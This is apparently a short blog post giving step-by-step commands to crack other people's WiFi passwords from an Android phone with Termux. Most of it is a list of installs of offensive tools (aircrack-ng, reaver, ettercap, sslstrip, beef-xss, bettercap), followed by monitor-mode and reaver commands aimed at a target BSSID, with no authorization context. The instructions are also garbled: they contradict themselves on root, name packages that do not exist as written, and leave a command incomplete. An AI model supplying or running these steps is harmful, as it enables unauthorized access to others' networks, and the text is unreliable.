🎩 HACK WIFI USING TERMUX APP IN ANDROID PHONE (NEED ROOT) 🎩
For Non-Rooted Device-
✅First install termux 
and open it. 
now type command- 
1. pkg install git && pkg install curl && pkg install python && pkg install python2 
now you have to install ubuntu in your termux app. 
UBUNTU is a type of linux. 
because it is linux based OPERATING SYSTEM. 
now 
type commands- 
0. termux-setup-storage 
1. clear 
2.termux-setup-storage 
3. ./start.sh 
4. clear 
5. apt-get install git 
6. apt-get install net-tools 
7. apt-get install termux-setup-storage-tools 
8. apt-get install wireless_tools 
9. apt-get install aircrack-ng 
10. apt-get install xterm 
11. apt-get install isc-dhcp-server 
12. apt-get install dhcp-server
13. apt-get install dhcp 
14. apt-get install reaver 
15. apt-get install ettercap 
16. apt-get install ettercap-text-only 
17. apt-get install ettercap-graphical 
18. apt-get install dsniff 
19. apt-get install hostapd 
20. apt-get install iptables 
21. apt-get install bully 
22. apt-get install sslstrip 
23. apt-get install beef-xss 
24. apt-get install beef-project 
25. apt-get install expect 
26. apt-get install expect-dev 
27. apt-get install lighttpd 
28. apt-get install crunch 
29. apt-get install hashcat 
30. apt-get install mdk3 
31. apt-get install bettercap 
32. apt-get install pixiewps 
33. apt-get install curl 
34. apt-get install pip
35. apt-get install airmon-ng 
36. airmon-ng stop wlan0 
37. airmon-ng start wlan0 
38. airodump-ng wlan0 
39. reaver -i 
now scroll up in your termux and copy your BSSID first 
now type cmd- 
40. reaver -i wlan0 -b [paste your BSSID] -vv 
now you will be switching on channel 1 in wlan0 
now you have to wait to get wifi password. 
reaver is best but it takes too much time according to your password whether it is hard or weak password it will crack

Comments

Popular Posts